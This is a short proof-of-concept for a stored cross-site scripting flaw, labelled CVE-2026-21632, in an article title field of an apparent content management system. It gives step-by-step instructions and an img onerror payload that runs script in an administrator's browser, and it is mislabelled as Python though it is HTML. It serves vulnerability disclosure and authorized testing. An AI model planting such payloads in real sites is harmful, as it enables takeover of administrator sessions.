The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-21632: Stored XSS in Article Title -->
<!-- Step 1: Log in as a user with permission to create articles (e.g., Author). -->
<!-- Step 2: Navigate to Content -> Articles -> Add New Article. -->
<!-- Step 3: Insert the following payload into the 'Title' field: -->
<img src=x onerror=alert('CVE-2026-21632')>
<!-- Step 4: Save the article. -->
<!-- Step 5: Trigger: View the article list or the article page as a privileged user (e.g., Administrator). -->
<!-- Result: The JavaScript alert will execute in the administrator's browser context. -->